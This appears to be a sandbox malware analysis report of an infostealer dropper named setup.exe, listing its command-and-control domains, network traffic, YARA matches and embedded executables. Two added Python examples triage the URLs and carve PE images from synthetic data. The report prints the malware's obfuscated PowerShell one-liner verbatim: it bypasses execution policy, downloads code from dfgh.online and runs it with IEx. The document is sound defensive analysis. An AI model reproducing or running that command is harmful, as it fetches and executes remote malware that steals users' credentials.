Source: setup.exe | String found in binary or memory: http://sv.symcb.com/sv.crl0W
Source: setup.exe | String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: setup.exe | String found in binary or memory: http://sv.symcd.com0&
Source: setup.exe | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: setup.exe | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: setup.exe | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: setup.exe | String found in binary or memory: http://www.innosetup.com/
Source: setup.exe | String found in binary or memory: http://www.remobjects.com/ps
Source: setup.exe | String found in binary or memory: http://www.remobjects.com/psU
Source: setup.exe | String found in binary or memory: http://www.symauth.com/cps0(
Source: setup.exe | String found in binary or memory: http://www.symauth.com/rpa00
Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 0000000A.00000002.1515220136.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1515220136.0000000004EE8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: setup.exe, setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cegu.shop/
Source: setup.exe, setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cegu.shop/8574262446/ph.txt
Source: setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cegu.shop/8574262446/ph.txt?
Source: setup.exe, setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cegu.shop:443/8574262446/ph.txt
Source: setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: setup.exe | String found in binary or memory: https://d.symcb.com/cps0%
Source: setup.exe | String found in binary or memory: https://d.symcb.com/rpa0
Source: powershell.exe, 0000000A.00000002.1515220136.0000000005380000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://dfgh.online/invoker.php?compName=
Source: powershell.exe, 0000000A.00000002.1515220136.00000000051A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://dfgh.online/invoker.php?compName=hZ
Source: setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: setup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fairiespar.cyou/
Source: setup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fairiespar.cyou/:z
Source: setup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fairiespar.cyou/Cert
Source: setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1494951035.0000000003E69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fairiespar.cyou/XBWQPea
Source: setup.exe, 00000000.00000002.1508503088.0000000000819000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1417494024.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fairiespar.cyou/api
Source: setup.exe, 00000000.00000002.1508503088.0000000000819000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fairiespar.cyou/apiers
Source: setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1400809409.0000000003E6C000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1417974487.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413835147.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1429890611.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1494951035.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413619922.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1418330853.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1400573113.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413958336.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fairiespar.cyou/hortp
Source: setup.exe, 00000000.00000003.1417396097.00000000008F3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fairiespar.cyou/let_
Source: setup.exe, 00000000.00000002.1508503088.0000000000819000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fairiespar.cyou/pi
Source: setup.exe, 00000000.00000003.1417396097.00000000008F3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fairiespar.cyou/u
Source: setup.exe, 00000000.00000003.1417396097.00000000008F3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fairiespar.cyou/w
Source: setup.exe | String found in binary or memory: https://fairiespar.cyou:443/api
Source: setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1494951035.0000000003E69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fairiespar.cyou:443/apiocal
Source: setup.exe, 00000000.00000003.1417974487.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413835147.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1429890611.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1494951035.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413619922.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1418330853.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413958336.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fairiespar.cyou:443/apiws
Source: setup.exe, setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://klipvumisui.shop/
Source: setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://klipvumisui.shop/)
Source: setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://klipvumisui.shop/c&
Source: setup.exe, 00000000.00000002.1508611151.0000000000867000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
Source: setup.exe, 00000000.00000003.1507348456.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.1508941560.00000000008DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtIe
Source: setup.exe | String found in binary or memory: https://klipvumisui.shop:443/int_clp_sha.txt
Source: setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://klipvumisui.shop:443/int_clp_sha.txtg0lh
Source: setup.exe, 00000000.00000003.1402013171.00000000040CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: setup.exe, 00000000.00000003.1402013171.00000000040CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: setup.exe, 00000000.00000003.1402013171.00000000040CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: setup.exe, 00000000.00000003.1402013171.00000000040CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: setup.exe, 00000000.00000003.1402013171.00000000040CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: setup.exe, 00000000.00000003.1402013171.00000000040CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: setup.exe, 00000000.00000003.1402013171.00000000040CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
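The string list above mixes three kinds of URL: certificate-chain and revocation endpoints that any signed Inno Setup binary carries, browser default search and vendor URLs that a stealer copies out of the profiles it reads, and the handful of hosts that are actually the sample's infrastructure. Memory-carved strings also pick up whatever bytes follow the URL (":z", "hZ", "g0lh", the DER "0" after a certificate URL), so the host is the reliable part. The script below is an added example, not part of the Joe Sandbox report or of the sample; it parses rows in the form shown above, strips the fused tail from the hostname and applies a triage allowlist that is an assumption of this example, not something the report states. The sample rows are a subset of the listing above.

```python
import re
from urllib.parse import urlsplit

# Constructed input: a subset of the "String found in binary or memory" rows from
# the listing above, as (reporting process, raw string) pairs. The raw strings keep
# the trailing junk the sandbox captured because that is what an analyst gets.
SAMPLE_ROWS = [
    ("setup.exe", "http://ocsp.thawte.com0"),
    ("setup.exe", "http://sf.symcb.com/sf.crl0f"),
    ("setup.exe", "http://x1.c.lencr.org/0"),
    ("setup.exe", "https://ac.ecosia.org/autocomplete?q="),
    ("powershell.exe", "https://aka.ms/pscore6lB"),
    ("setup.exe", "https://cegu.shop/8574262446/ph.txt?"),
    ("setup.exe", "https://cegu.shop:443/8574262446/ph.txt"),
    ("powershell.exe", "https://dfgh.online/invoker.php?compName=hZ"),
    ("setup.exe", "https://fairiespar.cyou/:z"),
    ("setup.exe", "https://fairiespar.cyou:443/apiws"),
    ("setup.exe", "https://fairiespar.cyou/api"),
    ("setup.exe", "https://klipvumisui.shop/int_clp_sha.txtg0lh"),
    ("setup.exe", "https://www.mozilla.org/privacy/firefox/gro.allizom.www."),
]

# Triage allowlist (an assumption of this example, not stated by the report). Entries
# starting with "." match the domain and its subdomains; the others match exactly.
BENIGN_SUFFIXES = (
    ".symcb.com", ".symcd.com", ".thawte.com", ".symantec.com", ".symauth.com",
    ".lencr.org",                                                   # signing / TLS chain URLs
    ".ecosia.org", ".duckduckgo.com", ".yahoo.com", ".google.com",  # browser search defaults
    ".mozilla.org", "aka.ms", "schemas.xmlsoap.org",                # vendor strings
    "www.innosetup.com", "www.remobjects.com",                      # installer tooling
)

ROW_RE = re.compile(r"Source:\s*([^,\s|]+).*?String found in binary or memory:\s*(\S+)")
# Longest DNS-looking prefix of a hostname: drops bytes fused onto the end of the string.
HOST_RE = re.compile(r"^([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})")


def parse_row(line):
    """Split one report row into (process, raw string); None for rows of another kind."""
    m = ROW_RE.search(line)
    return (m.group(1), m.group(2)) if m else None


def host_of(url):
    """Hostname of a memory-carved URL with any fused tail removed; None if unparseable."""
    try:
        host = urlsplit(url).hostname
    except ValueError:
        return None
    if not host:
        return None
    m = HOST_RE.match(host.lower())
    return m.group(1) if m else None


def is_benign(host, benign=BENIGN_SUFFIXES):
    for s in benign:
        if s.startswith("."):
            if host == s[1:] or host.endswith(s):
                return True
        elif host == s:
            return True
    return False


def triage(rows, benign=BENIGN_SUFFIXES):
    """Group non-allowlisted hosts with the processes and raw URLs that referenced them."""
    out = {}
    for proc, raw in rows:
        host = host_of(raw)
        if host is None or is_benign(host, benign):
            continue
        entry = out.setdefault(host, {"processes": set(), "urls": set()})
        entry["processes"].add(proc)
        entry["urls"].add(raw)
    return out


def suspicious_hosts(rows, benign=BENIGN_SUFFIXES):
    return sorted(triage(rows, benign))


if __name__ == "__main__":
    for host, info in triage(SAMPLE_ROWS).items():
        print(f"{host:18} seen in {sorted(info['processes'])}: {sorted(info['urls'])}")
```

The grouping by process is deliberate: dfgh.online only ever appears in powershell.exe memory (it is the stager contacted by the command line further down), while the three .shop/.cyou hosts appear only in setup.exe, which separates the loader's infrastructure from the stealer's. Paths such as "apiws" or "apiocal" are the "/api" endpoint followed by neighbouring memory and should not be used as path indicators as written.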
Source: unknown | Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49760 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49772 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49779 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49816 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.7:49823 version: TLS 1.2

              System Summary

Source: 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_0307136A
Source: setup.exe | Static PE information: invalid certificate
Source: setup.exe | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: setup.exe | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: setup.exe | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: setup.exe, 00000000.00000003.1353030732.000000000387F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs setup.exe
Source: setup.exe, 00000000.00000002.1508284214.00000000004AE000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs setup.exe
Source: setup.exe | Binary or memory string: OriginalFilenameshfolder.dll~/ vs setup.exe
Source: setup.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/3@3/2
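The three RT_RCDATA resources listed above are each a complete PE image (an x64 console executable, an x86 GUI executable and an x86 DLL) packed into a 74 MB installer. Pulling them out does not need a full PE parser: a scan for MZ headers that validates e_lfanew, the PE signature, the COFF machine field and the section table is enough to locate each image, classify it the way the report does and know where it ends. The code below is an added example, not from Joe Sandbox or from the sample; build_min_pe constructs synthetic headers so the example runs offline, and those synthetic images stand in for the sample's resources rather than reproducing them.

```python
import struct

MACHINE = {0x014C: "Intel 80386", 0x8664: "x86-64"}
SUBSYSTEM = {2: "GUI", 3: "console"}
IMAGE_FILE_DLL = 0x2000


def parse_pe_at(blob, off):
    """Validate a candidate MZ header at off and summarise the image, or return None."""
    try:
        if blob[off:off + 2] != b"MZ":
            return None
        e_lfanew = struct.unpack_from("<I", blob, off + 0x3C)[0]
        if e_lfanew < 0x40 or e_lfanew > 0x1000:      # real headers sit close to the DOS stub
            return None
        pe = off + e_lfanew
        if blob[pe:pe + 4] != b"PE\0\0":
            return None
        machine, nsec, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", blob, pe + 4)
        if machine not in MACHINE or not 0 < nsec <= 96:
            return None
        opt = pe + 24
        magic = struct.unpack_from("<H", blob, opt)[0]
        if magic not in (0x10B, 0x20B):                # PE32 / PE32+
            return None
        subsystem = struct.unpack_from("<H", blob, opt + 68)[0]   # same offset in both formats
        sections = opt + opt_size
        end = 0
        for i in range(nsec):                          # SizeOfRawData, PointerToRawData
            size_raw, ptr_raw = struct.unpack_from("<II", blob, sections + i * 40 + 16)
            end = max(end, ptr_raw + size_raw)
    except struct.error:
        return None
    if end == 0:
        return None
    return {
        "offset": off,
        "size": end,
        "truncated": off + end > len(blob),
        "format": "PE32+" if magic == 0x20B else "PE32",
        "arch": MACHINE[machine],
        "kind": "DLL" if chars & IMAGE_FILE_DLL else "EXE",
        "subsystem": SUBSYSTEM.get(subsystem, f"subsystem {subsystem}"),
    }


def carve_pe(blob):
    """Find every embedded PE image, skipping over the body of each one that validates."""
    found, pos = [], blob.find(b"MZ")
    while pos != -1:
        hdr = parse_pe_at(blob, pos)
        if hdr:
            found.append(hdr)
            pos = blob.find(b"MZ", pos + hdr["size"])
        else:
            pos = blob.find(b"MZ", pos + 1)
    return found


def build_min_pe(machine, subsystem, is_dll=False, payload=b"\x90" * 16):
    """Constructed, non-runnable PE carrying only the fields parse_pe_at reads."""
    pe32plus = machine == 0x8664
    opt_size = 240 if pe32plus else 224
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    raw_off = e_lfanew + 4 + 20 + opt_size + 40         # headers plus one section entry
    chars = 0x0002 | (IMAGE_FILE_DLL if is_dll else 0)   # EXECUTABLE_IMAGE [+ DLL]
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, opt_size, chars)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 68, subsystem)
    section = b".text\0\0\0" + struct.pack("<IIIIIIHHI", len(payload), 0x1000,
                                           len(payload), raw_off, 0, 0, 0, 0, 0x60000020)
    return dos + b"PE\0\0" + coff + bytes(opt) + section + payload


def build_container():
    """Dropper-like blob: junk, x64 console EXE, junk, x86 GUI EXE, a stray 'MZ', x86 DLL."""
    return (b"Inno" + b"\0" * 37
            + build_min_pe(0x8664, 3)
            + b"\xff" * 10
            + build_min_pe(0x014C, 2)
            + b"MZ" + b"\0" * 20
            + build_min_pe(0x014C, 2, is_dll=True))


if __name__ == "__main__":
    for h in carve_pe(build_container()):
        print(f"offset {h['offset']:6}: {h['format']} {h['kind']} {h['arch']} "
              f"({h['subsystem']}), {h['size']} bytes")
```

On a real dropper, read the file into blob and write blob[h["offset"]:h["offset"] + h["size"]] for each hit; the stray "MZ" in the constructed container shows why the e_lfanew and signature checks matter, since two bytes alone match constantly in a 74 MB file. Overlays and resources that are compressed rather than stored raw will not be found this way and need the installer's own unpacker.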
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cip1fhdl.bla.ps1
Source: C:\Users\user\Desktop\setup.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: setup.exe, 00000000.00000003.1377759445.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1389286858.0000000003F06000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377466459.0000000003E9A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1389286858.0000000003E83000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: setup.exe | ReversingLabs: Detection: 15%
Source: setup.exe | String found in binary or memory: /LoadInf=
Source: setup.exe | String found in binary or memory: /LoadInf=
Source: C:\Users\user\Desktop\setup.exe | File read: C:\Users\user\Desktop\setup.exe
Source: unknown | Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -
Source: C:\Users\user\Desktop\setup.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: acgenral.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: samcli.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: msacm32.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\setup.exe | Section loaded: ntmarta.dll
